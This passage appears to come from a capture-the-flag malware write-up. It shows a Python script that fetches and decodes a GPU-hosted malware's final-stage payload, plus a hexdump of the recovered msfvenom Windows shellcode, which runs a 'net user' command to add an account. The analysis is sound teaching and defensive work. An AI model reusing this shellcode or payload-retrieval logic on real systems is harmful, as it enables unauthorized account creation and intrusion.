    # the GPU and truncates afterwards. Do the same, otherwise pack_into()
    # raises struct.error on a trailing partial word.
    padded_len = (len(chunk) + 3) & ~3
    buf = bytearray(chunk).ljust(padded_len, b"\0")

    for off in range(0, padded_len, 4):
        dword = int.from_bytes(buf[off:off + 4], "little")
        plain32 = ((dword ^ key) + 0x11001122) & 0xFFFF_FFFF
        pack_into("<I", buf, off, plain32)
    return bytes(buf[:len(chunk)])
def main():
    """Rebuild the final-stage payload and write it to ``payload.bin``.

    Mirrors the malware's own logic: ask ``/size`` for the payload length,
    fetch ceil(size / 16) parts numbered from 1, decode each part, and keep
    only ``size`` bytes of the result.
    """
    # The binary parses the /size response with atoi(), so it is ASCII digits.
    total_size = int(fetch("size").decode("ascii").strip())
    part_count = (total_size + 15) // 16

    plaintext = bytearray()
    for i in range(1, part_count + 1):
        buf = fetch(str(i))
        decoded = decode_chunk(buf, i)
        plaintext.extend(decoded)

    with open("payload.bin", "wb") as f:
        f.write(plaintext[:total_size])


if __name__ == "__main__":
    main()
Flag
Once we run this script we get the final payload:
hexdump -C payload.bin
00000000 fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 |.H........AQAPRQ|
00000010 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 |VH1.eH.R`H.R.H.R|
00000020 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 | H.rPH..JJM1.H1.|
00000030 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed |.<a|., A...A....|
00000040 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 |RAQH.R .B<H.....|
00000050 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 |...H..tgH..P.H.D|
00000060 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 |.@ I...VH..A.4.H|
00000070 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 |..M1.H1..A...A..|
00000080 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 |8.u.L.L$.E9.u.XD|
00000090 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 |.@$I..fA..HD.@.I|
000000a0 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a |..A...H..AXAX^YZ|
000000b0 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 |AXAYAZH.. AR..XA|
000000c0 59 5a 48 8b 12 e9 57 ff ff ff 5d 48 ba 01 00 00 |YZH...W...]H....|
000000d0 00 00 00 00 00 48 8d 8d 01 01 00 00 41 ba 31 8b |.....H......A.1.|
000000e0 6f 87 ff d5 bb f0 b5 a2 56 41 ba a6 95 bd 9d ff |o.......VA......|
000000f0 d5 48 83 c4 28 3c 06 7c 0a 80 fb e0 75 05 bb 47 |.H..(<.|....u..G|
00000100 13 72 6f 6a 00 59 41 89 da ff d5 6e 65 74 20 75 |.roj.YA....net u|
00000110 73 65 72 20 47 50 55 5f 6d 34 6c 77 61 72 65 73 |ser GPU_m4lwares|
00000120 5f 41 52 45 5f 66 75 6e 20 74 44 74 4e 52 59 4a |_ARE_fun tDtNRYJ|
We can see a plaintext string at the end: net user GPU_m4lwares_ARE_fun tDtNRYJ, which is a Windows command to add a user (the payload is an msfvenom shellcode that adds a user on the PC).